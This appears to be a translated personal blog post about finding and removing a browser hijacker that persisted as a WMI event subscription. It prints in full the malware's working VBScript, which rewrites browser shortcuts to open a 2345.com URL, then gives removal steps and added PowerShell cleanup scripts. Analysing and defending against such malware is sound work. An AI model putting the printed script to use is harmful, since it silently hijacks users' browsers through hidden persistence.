One day, in order to download some resources from verycd.com, I searched for a "verycd link viewer" (for reasons you can probably guess). The result was a real fly of a program!......
I couldn't find any download link in it, so I deleted it straight away. But then I found that the browser was being redirected somewhere else every time it opened!
In the end it turned out that the shortcut commands in the Quick Launch bar had been modified. The modified command looks like this:
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.2345.com/?kunown
So I fixed the shortcuts the normal way, manually deleting the "http://www.2345.com/?kunown" part. That didn't last long, though: half an hour later it had been changed again, so the system really had been compromised ~!
Norton is installed on this machine and detected nothing at all.
I installed Super Rabbit, 360, ExterminateIt and other tools to check ......, then uninstalled all of them ...... (After uninstalling Super Rabbit I found it had left its own browser junk behind!!! Spammy enough ~! I removed that by hand; I won't go into it here!)
I opened Process Monitor and dug into it, and found that an scrcons.exe process starts automatically every 30 minutes, modifies the commands in the Quick Launch bar, and then exits by itself (thanks to that; if it only ran once every 24 hours I'd have been in real trouble ......). On Win7 the Opera Quick Launch icon it modifies is at:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.011532.lnk
After looking it up, I found that this is a scheduled script started automatically by WMI.
To view WMI events, download and install WMI Tools from the following address:
http://www.microsoft.com/en-us/download/details.aspx?id=24045
After installation, open WMI Event Viewer and click "Register for Events" in the upper left corner. The "Connect to namespace" box appears; enter "root\subscription" and click OK. The following is displayed:
Click __EventFilter: Name="unown_filter" on the left, right-click ActiveScriptEventConsumer.Name="unown" on the right, and select "View Instance Properties", for example:
Look at the ScriptText item: it is a VBScript that the system service executes every 30 minutes, appending "http://www.2345.com/?kunown"! Got you ~! Hidden deep enough: no resident process, no files (it stores itself in the WMI repository). Damn ~!
The affected browsers are:
IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, sogoupolicer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe
The code is as follows:
On Error Resume Next
Const link = "http://www.2345.com/?kunown"
' Browser executables whose shortcuts get the URL appended as an argument
Browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "sogoupolicer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set oDic = CreateObject("Scripting.Dictionary")
For Each browser In Browsers: oDic.Add LCase(browser), browser: Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = CreateObject("WScript.Shell")
' Folders that are searched for .lnk files
strDesktop = "C:\Users\Gemini\Desktop"
strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop")
QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu"
UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar"
' User desktop
For Each file In fso.GetFolder(strDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            ' clear the read-only attribute (bit 1) so Save succeeds
            If file.Attributes And 1 Then file.Attributes = file.Attributes - 1
            oShellLink.Save
        End If
    End If
Next
' All Users desktop
For Each file In fso.GetFolder(strAllUsersDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            If file.Attributes And 1 Then file.Attributes = file.Attributes - 1
            oShellLink.Save
        End If
    End If
Next
' Quick Launch
If fso.FolderExists(QuickLaunch) Then
    For Each file In fso.GetFolder(QuickLaunch).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then file.Attributes = file.Attributes - 1
                oShellLink.Save
            End If
        End If
    Next
End If
' Pinned Start Menu items
If fso.FolderExists(UserPinnedStartMenu) Then
    For Each file In fso.GetFolder(UserPinnedStartMenu).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then file.Attributes = file.Attributes - 1
                oShellLink.Save
            End If
        End If
    Next
End If
' Pinned taskbar items
If fso.FolderExists(UserPinnedTaskBar) Then
    For Each file In fso.GetFolder(UserPinnedTaskBar).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then file.Attributes = file.Attributes - 1
                oShellLink.Save
            End If
        End If
    Next
End If
Finally, clean it up by right-clicking __EventFilter: Name="unown_filter" in WMI Event Viewer and deleting it!
Can't delete it?
Go to the WMI Tools installation folder (for example C:\Program Files (x86)\WMI Tools), right-click wbemeventviewer.exe and choose "Run as administrator"! Deleted!
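The viewer steps above (connect to root\subscription, find the __EventFilter and the ActiveScriptEventConsumer, read its ScriptText, delete the filter) can be done from the command line as well. The PowerShell below is an added example, not code from the original post: it lists every __FilterToConsumerBinding in root\subscription together with the filter's WQL query and, for script consumers (which scrcons.exe hosts), the script text; with -Remove it deletes the binding, the consumer and the filter. The filter and consumer names default to the ones the post shows ("unown_filter", "unown"); any other names are your own input. Run it from an elevated prompt, which is the same reason the viewer only deleted the entry after "Run as administrator".

```powershell
# Added example (not from the original post): triage and remove a WMI
# permanent event subscription in root\subscription.
# Assumes Windows PowerShell 5.1+ run as administrator.
[CmdletBinding()]
param(
    [string]$FilterName   = 'unown_filter',   # __EventFilter.Name shown in the post
    [string]$ConsumerName = 'unown',          # ActiveScriptEventConsumer.Name shown in the post
    [switch]$Remove                           # without this switch: report only
)

$ns = 'root\subscription'   # namespace where permanent subscriptions live

function Get-SubscriptionReport {
    # Each binding joins one filter (the trigger) to one consumer (the action).
    # The reference properties only carry the key, so the full instances are fetched.
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        $filter   = Get-CimInstance -Namespace $ns -ClassName __EventFilter `
                        -Filter "Name='$($b.Filter.Name)'"
        $consumer = Get-CimInstance -Namespace $ns -ClassName __EventConsumer `
                        -Filter "Name='$($b.Consumer.Name)'"
        $type = $consumer.CimClass.CimClassName
        $payload = switch ($type) {
            'ActiveScriptEventConsumer' { "$($consumer.ScriptingEngine): $($consumer.ScriptText)" }
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            default                     { '(no script or command line payload)' }
        }
        [pscustomobject]@{
            Filter   = $filter.Name
            Query    = $filter.Query     # WQL; a timer or polling query means a periodic run
            Consumer = $consumer.Name
            Type     = $type
            Payload  = $payload
        }
    }
}

function Remove-Subscription {
    param([string]$Filter, [string]$Consumer)
    # Binding first so nothing fires while the endpoints are removed.
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $Filter -or $_.Consumer.Name -eq $Consumer } |
        Remove-CimInstance -Verbose
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer -Filter "Name='$Consumer'" |
        Remove-CimInstance -Verbose
    Get-CimInstance -Namespace $ns -ClassName __EventFilter -Filter "Name='$Filter'" |
        Remove-CimInstance -Verbose
}

Get-SubscriptionReport | Format-List
if ($Remove) { Remove-Subscription -Filter $FilterName -Consumer $ConsumerName }
```

Run it once without -Remove and read the Payload column: a scripting consumer whose ScriptText rewrites shortcuts is the finding the post describes, while a machine may also carry legitimate subscriptions (management agents use the same mechanism), so remove by name rather than clearing the namespace. Removing all three objects, not just the filter, avoids leaving an orphaned consumer that a new filter could be bound to later.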
Before you're done, you also need to manually remove http://www.2345.com/?kunown from the shortcuts in the Quick Launch bar!
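The script's own logic walks the user's Desktop, the All Users desktop, Quick Launch and the two User Pinned folders, and rewrites the Arguments of every .lnk whose target file name is one of the listed browsers. The PowerShell below is an added example, not the post's code: it checks the same five folders for the current user and reports every shortcut whose arguments begin with a URL, which is broader than the single URL the post shows; with -Fix it clears those arguments and, like the script, deals with the read-only attribute first. It assumes Windows PowerShell and that the shortcuts live in the current user's profile.

```powershell
# Added example (not from the original post): find browser shortcuts whose
# arguments have been replaced with a URL and optionally clear them.
[CmdletBinding()]
param([switch]$Fix)   # without -Fix: report only

$wsh = New-Object -ComObject WScript.Shell
$quickLaunch = Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch'
# The same five locations the hijack script walks, resolved for the current user
$folders = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    $quickLaunch,
    (Join-Path $quickLaunch 'User Pinned\StartMenu'),
    (Join-Path $quickLaunch 'User Pinned\TaskBar')
) | Where-Object { Test-Path -LiteralPath $_ }

function Get-HijackedShortcut {
    foreach ($folder in $folders) {
        # -Force also lists hidden shortcuts; -File skips subfolders
        foreach ($lnk in Get-ChildItem -LiteralPath $folder -Filter *.lnk -Force -File) {
            $sc = $wsh.CreateShortcut($lnk.FullName)
            # A bare URL as the whole argument string is the pattern from the post
            if ($sc.Arguments -match '^\s*https?://') {
                [pscustomobject]@{
                    Shortcut  = $lnk.FullName
                    Target    = $sc.TargetPath
                    Arguments = $sc.Arguments
                    ReadOnly  = $lnk.IsReadOnly
                }
            }
        }
    }
}

$hits = @(Get-HijackedShortcut)
$hits | Format-Table -AutoSize

if ($Fix) {
    foreach ($h in $hits) {
        $item = Get-Item -LiteralPath $h.Shortcut -Force
        # CreateShortcut().Save() fails on a read-only file, which is why the
        # hijack script cleared attribute bit 1 before saving
        if ($item.IsReadOnly) { $item.IsReadOnly = $false }
        $sc = $wsh.CreateShortcut($h.Shortcut)
        $sc.Arguments = ''
        $sc.Save()
        Write-Host "cleaned $($h.Shortcut)"
    }
}
```

Read the report before using -Fix: a few shortcuts pass a URL on purpose (for example a web application pinned as a shortcut), and those should be left alone. Since the WMI subscription rewrites the shortcuts every 30 minutes, clean them only after the subscription itself is gone, otherwise the report will fill up again on the next run.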
That's all for now. If nothing else turns up, then that's the end of it!
Well, that was my rant about this fly!